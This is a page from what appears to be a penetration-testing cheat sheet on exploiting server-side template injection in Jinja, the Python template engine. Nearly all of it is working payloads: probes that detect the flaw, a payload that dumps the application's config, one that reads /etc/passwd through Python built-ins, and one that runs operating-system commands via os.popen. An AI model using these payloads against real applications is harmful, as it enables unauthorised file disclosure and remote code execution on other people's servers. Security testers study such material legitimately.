JINJA (EXPLOITATION)

Jinja is a template engine commonly used in Python web frameworks such as Flask or Django

INFORMATION DISCLOSURE

IDENTIFICATION

#identification
root@oco:~$ BROWSER > {targetSite:port}
 input field: ${7*7}
  - Hi ${7*7}!
     - failed
 input field: {{7*7}}
  - Hi 49!
     - Success
 input field: {{7*'7'}}
  - Hi 49!
     - Success
     
 * Jinja: 7777777
   Twig: 49

DUMP CONFIGURATION DETAILS

#obtain internal information about the web application, including configuration details and the web application's source code
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ config.items() }}

LFI

#dump all available built-in Python functions
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ self.__init__.__globals__.__builtins__ }}
 
#using Python's built-in function to inlcude a local file
#LFI
#with this, you can't call the "open" function directly; you need to call it from the __builtins__ dictionary that was dumped earlier
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}

RCE

#dump all available built-in Python functions
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ self.__init__.__globals__.__builtins__ }}

#must use functions provided by the os library, such as system or popen
#must include the functions if its not already imported by the target
root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

PreviousIDENTIFICATION NextTWIG (EXPLOITATION)

Last updated 4 months ago